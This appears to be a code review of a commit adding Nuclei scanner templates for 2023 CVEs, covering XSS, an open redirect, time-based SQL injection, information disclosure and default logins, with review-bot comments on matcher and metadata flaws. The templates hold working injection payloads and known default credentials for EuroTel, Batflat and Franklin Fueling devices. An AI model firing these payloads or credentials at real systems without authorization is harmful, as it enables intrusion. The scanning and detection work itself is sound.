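+    - https://medium.com/@muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-40779
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-40779
+    cwe-id: CWE-601
+    cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"IceWarp"
+  tags: cve,cve2023,icewarp,redirect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%5coast.pro/%2f%2e%2e"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
+
+      - type: status
+        status:
+          - 302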
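Review bot: The description claims the issue 'allows a remote attacker to execute arbitrary code', which contradicts the name (Open Redirect), `cwe-id: CWE-601`, the 6.1 UI:R vector and the Location-header regex matcher; the text should describe the redirect, e.g. 'IceWarp WebClient redirects the browser to an external host supplied in a crafted path'. Since the matcher confirms only a 302 whose `Location` points at `oast.pro`, the template demonstrates a redirect and nothing more, so the description should not overstate the impact.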
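--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4110)
@@ -0,0 +1,35 @@
+id: CVE-2023-4110
+
+info:
+  name: PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.
+  reference:
+    - http://packetstormsecurity.com/files/173926/PHPJabbers-Availability-Booking-Calendar-5.0-Cross-Site-Scripting.html
+    - https://vuldb.com/?id.235957
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4110
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-4110
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,xss,phpjabber,jabber
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "Booking", "Arrival", "><script>alert(document.domain)</script>")'
+        condition: and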
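Review bot: The tag list ends with `phpjabber,jabber`, while the other PHPJabbers templates in this commit spell the vendor as `phpjabbers` (CVE-2023-4112, CVE-2023-4116) or split it as `php,jabbers` (CVE-2023-4113, CVE-2023-4114); CVE-2023-4111, CVE-2023-4115 and CVE-2023-41538 use the same `phpjabber,jabber` form as this one. Three spellings for one vendor means `-tags phpjabbers` selects only two of the eight templates; I'd standardise on `tags: cve,cve2023,xss,phpjabbers` across all of them.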
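--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4111)
@@ -0,0 +1,35 @@
+id: CVE-2023-4111
+
+info:
+  name: PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.
+  reference:
+    - https://vuldb.com/?id.235958
+    - https://packetstormsecurity.com/files/173927/PHPJabbers-Bus-Reservation-System-1.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4111
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-4111
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,xss,phpjabber,jabber
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "You have an error in your SQL syntax", "><script>alert(document.domain)</script>")'
+          - 'contains(content_type, "text/html")'
+          - 'status_code == 200'
+        condition: and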
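Review bot: The body matcher requires `You have an error in your SQL syntax` together with the reflected payload, so detection depends on the application leaking a database error into the page; a deployment with error display disabled would still reflect the script but never match. If the error is incidental to the XSS, a stable page marker like the ones the sibling templates use (`contains_all(body, "<page marker>", "><script>alert(document.domain)</script>")`) is the more reliable anchor. The leaked SQL error text is itself an information-exposure finding worth tracking separately from this XSS.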
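--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4112)
@@ -0,0 +1,37 @@
+id: CVE-2023-4112
+
+info:
+  name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39750
+    - https://cxsecurity.com/ascii/WLB-2023080012
+    - http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4112
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-4112
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"PHP Jabbers.com"
+  tags: cve,cve2023,xss,unauth,phpjabbers
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
+          - 'contains(content_type, "text/html")'
+          - 'status_code == 200'
+        condition: and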
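Review bot: The description is a generic sentence about sending a victim a malicious link and never says what is vulnerable — the affected file and parameter are absent — and CVE-2023-4115 in this commit carries the identical boilerplate. Replace both with the vulnerability-specific summary from the linked NVD entry, which names the affected script and argument, as the other PHPJabbers templates here already do.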
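--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4113)
@@ -0,0 +1,34 @@
+id: CVE-2023-4113
+
+info:
+  name: PHPJabbers Service Booking Script 1.0 - Cross Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.
+  reference:
+    - http://packetstormsecurity.com/files/173931/PHPJabbers-Service-Booking-Script-1.0-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4113
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-4113
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,xss,php,jabbers
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "Select Service(s)", "><script>alert(document.domain)</script>")'
+        condition: and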
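--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4114)
@@ -0,0 +1,35 @@
+id: CVE-2023-4114
+
+info:
+  name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39749
+    - http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4114
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-4114
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,xss,php,jabbers
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")'
+        condition: and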
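--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4115)
@@ -0,0 +1,35 @@
+id: CVE-2023-4115
+
+info:
+  name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39747
+    - https://cxsecurity.com/ascii/WLB-2023080015
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4115
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-4115
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,xss,phpjabber,jabber
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "Enquiry summary", "><script>alert(document.domain)</script>")'
+        condition: and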
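--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4116)
@@ -0,0 +1,38 @@
+id: CVE-2023-4116
+
+info:
+  name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39746
+    - https://cxsecurity.com/ascii/WLB-2023080016
+    - http://packetstormsecurity.com/files/173937/PHPJabbers-Taxi-Booking-2.0-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4116
+    - https://vuldb.com/?ctiid.235963
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-4116
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"PHP Jabbers.com"
+  tags: cve,cve2023,xss,phpjabbers
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "Passengers", "Drop-off address", "><script>alert(document.domain)</script>")'
+        condition: and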
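--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4148)
@@ -0,0 +1,44 @@
+id: CVE-2023-4148
+info:
+  name: Ditty < 3.1.25 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
+  remediation: Fixed in version 3.1.25
+  reference:
+    - https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4148
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+    cve-id: CVE-2023-4148
+    cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    publicwww-query: "/wp-content/plugins/ditty-news-ticker/"
+  tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"><script>alert(/XSS/)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "<script>alert(/XSS/)</script>") && contains(body_2, "ditty")'
+          - 'contains(content_type_2, "text/html")'
+        condition: and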
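Review bot: `max-request: 1` under `metadata` is wrong for this template, which issues two raw requests (the `wp-login.php` POST and the `wp-admin/edit.php` GET); it should read `max-request: 2`. The `classification` block also lists `cwe-id` before `cve-id`, the reverse of most templates in this commit (CVE-2023-5244 has the same ordering) — harmless, but worth aligning. As with the rConfig template, the login relies on operator-supplied `{{username}}`/`{{password}}` variables, which the description could state explicitly.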
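--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-41538)
@@ -0,0 +1,34 @@
+id: CVE-2023-41538
+
+info:
+  name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
+  reference:
+    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-41538
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-41538
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,xss,phpjabber,jabber
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "New Question", "><script>alert(document.domain)</script>")'
+        condition: and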
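Review bot: The `keyword` value mixes percent-encoding (`%22`) with raw `<`, `>` and `/` characters in the request target, unlike the sibling templates, which encode the whole value; raw angle brackets in a request line are rejected by some servers and proxies, so the check may fail on a vulnerable host for transport reasons rather than because the page is patched. Encoding it consistently (`keyword=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E`) matches the other PHPJabbers templates, and the `contains_all` body check is unaffected.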
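--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4168)
@@ -0,0 +1,34 @@
+id: CVE-2023-4168
+
+info:
+  name: Adlisting Classified Ads 2.14.0 - Information Disclosure
+  author: r3Y3r53
+  severity: high
+  description: |
+    Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.
+  reference:
+    - https://www.exploit-db.com/exploits/51667
+    - https://templatecookie.com/demo/adlisting-classified-ads-script
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4168
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-4168
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,adlisting,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "google_map_key", "api_key", "auth_domain")'
+        condition: and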
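Review bot: The description says the data is exposed 'in the body of these redirects', yet the dsl requires `status_code == 200` and the request sets no `host-redirects`/`max-redirects`, so nuclei inspects only the first response; if the exposure really sits in a 3xx response this matcher never fires, and if it sits in the final 200 page the description is misleading. One of the two should be reconciled — either reword the description to describe the 200 page or add `host-redirects: true` and `max-redirects: 2` (constructed value) so the redirect chain is followed. The path also repeats `keyword`, `lat` and `long` twice, which looks like copy-paste rather than intent.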
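--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4547)
@@ -0,0 +1,43 @@
+id: CVE-2023-4547
+
+info:
+  name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
+  author: theamanrawat
+  severity: medium
+  description: |
+    A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
+  reference:
+    - https://spa-cart.com
+    - https://cxsecurity.com/ascii/WLB-2023080090
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4547
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 3.5
+    cve-id: CVE-2023-4547
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2023,spa-cart,unauth,xss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '100-1331"><script>alert(document.cookie)</script>'
+          - '<table class="products-nav">'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200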
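Review bot: `cvss-score: 3.5` does not correspond to `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`, the same vector the rConfig template in this commit pairs with 8.8; that vector also describes an authenticated high-impact issue, while the name, `cwe-id: CWE-79` and the `unauth` tag describe an unauthenticated reflected XSS, for which the sibling templates use `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` with 6.1. Separately, `verified: "true"` is a quoted string here whereas every other template uses the boolean `verified: true`, so tooling that filters on the boolean will treat this one differently. The `metadata` block also lacks `max-request: 1`.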
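--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-4974)
@@ -0,0 +1,36 @@
+id: CVE-2023-4974
+
+info:
+  name: Academy LMS 6.2 - SQL Injection
+  author: theamanrawat
+  severity: medium
+  description: |
+    A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
+  reference:
+    - https://demo.creativeitem.com/academy/
+    - https://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4974
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 6.3
+    cve-id: CVE-2023-4974
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    shodan-query: html:"Academy LMS"
+  tags: cve,cve2023,sqli,academy,lms
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        GET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - duration>=7
+          - status_code == 500
+          - contains(body, "Courses</span>")
+        condition: and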
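Review bot: The dsl requires `status_code == 500` in addition to `duration>=7`; for a time-based check the delay is the signal, and tying it to a 500 means a host that sleeps but renders the page normally is reported as clean. If the 500 was consistently observed during verification, a comment saying so would justify the line; otherwise dropping it and keeping the `Courses</span>` page marker is the more robust form. The `metadata` block also lacks `max-request: 1`, which the other templates in this commit carry.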
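--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id CVE-2023-5244)
@@ -0,0 +1,36 @@
+id: CVE-2023-5244
+
+info:
+  name: Microweber < V.2.0 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.
+  reference:
+    - https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470/
+    - https://vuldb.com/?id.240778
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5244
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+    cve-id: CVE-2023-5244
+    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.favicon.hash:780351152
+  tags: cve,cve2023,xss,microweber
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains_all(body, "alert(document.domain)", "microweber")'
+        condition: and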
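Review bot: The body check `contains_all(body, "alert(document.domain)", "microweber")` confirms only that the literal `alert(document.domain)` is reflected, and that substring contains no character an HTML or JavaScript escaper would change, so a patched build that escapes the quote and brace characters still reflects it and yields a false positive. Match the context-breaking part of the reflection as well, e.g. `contains(body, "';});alert(document.domain);")`, in the same way the other XSS templates in this commit include the surrounding `><` characters in their body checks.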
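--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id batflat-default-login)
@@ -0,0 +1,41 @@
+id: batflat-default-login
+
+info:
+  name: Batflat CMS - Default Login
+  author: r3Y3r53
+  severity: high
+  description: |
+    Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=34749
+    - https://cxsecurity.com/issue/WLB-2020010100
+  metadata:
+    google-query: intext:"Powered by Batflat."
+    verified: true
+  tags: default-login,batflat
+
+http:
+  - raw:
+      - |
+        POST /admin/ HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}&login=
+
+    attack: pitchfork
+    payloads:
+      username:
+        - "admin"
+      password:
+        - "admin"
+
+    cookie-reuse: true
+    host-redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "Batflat - Dashboard")'
+        condition: and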
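Review bot: The request line reads `POST /admin/ HTTP/2` while every other raw request in this commit uses `HTTP/1.1`; as far as I know nuclei does not negotiate HTTP/2 from the version token of a raw request, so at best the token is ignored and at worst a strict server rejects the request — `POST /admin/ HTTP/1.1` is the safe form. The `metadata` block also lacks `max-request: 1`, which the other default-login templates carry.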
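--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id etl3100-default-login)
@@ -0,0 +1,46 @@
+id: etl3100-default-login
+
+info:
+  name: EuroTel ETL3100 - Default Login
+  author: r3Y3r53
+  severity: high
+  description: |
+    The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
+  reference:
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
+    - https://www.exploit-db.com/exploits/51684
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: html:"ETL3100"
+    fofa-query: body="ETL3100"
+  tags: misconfig,default-login,eurotel
+
+http:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login
+
+      - |
+        GET /exciter.php HTTP/1.1
+        Host: {{Hostname}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - user
+        - operator
+      password:
+        - etl3100rt1234
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")'
+        condition: and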
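Review bot: `attack: pitchfork` pairs the payload lists positionally, so with two `username` entries and a single `password` only the first pair is sent and `operator` is never tried, as I understand nuclei's pitchfork mode; either add a matching second `password` entry or switch to `attack: clusterbomb`, and in the latter case raise `max-request` to `4` because the two raw requests run once per combination. The franklin-fueling-default-login template in this commit has the same shape, with three usernames and one password.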
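--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE (template id franklin-fueling-default-login)
@@ -0,0 +1,42 @@
+id: franklin-fueling-default-login
+
+info:
+  name: Franklin Fueling System Default Login - Detect
+  author: r3Y3r53
+  severity: high
+  description: |
+    A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39466
+  metadata:
+    google-query: inurl:"relay_status.html"
+    verified: true
+    max-request: 1
+  tags: default-login,franklin
+
+http:
+  - raw:
+      - |
+        POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
+
+    attack: pitchfork
+    payloads:
+      username:
+        - roleAdmin
+        - roleUser
+        - roleGuest
+      password:
+        - admin
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/xml")'
+          - 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
+        condition: and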
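Review bot: The success check `contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")` can pass on a rejected login if the service echoes the submitted `ROLE` attribute back in its error response, because the request itself carries those strings; the matcher should key on whatever the success response contains (a session or result element) rather than on the role name, and `verified: true` suggests the author has such a response to take it from. The payload lists share the pitchfork mismatch raised on etl3100-default-login. The name `Franklin Fueling System Default Login - Detect` also departs from the `<Product> - Default Login` form used by the other two default-login templates, and the description is a generic definition of default passwords rather than a statement about this product.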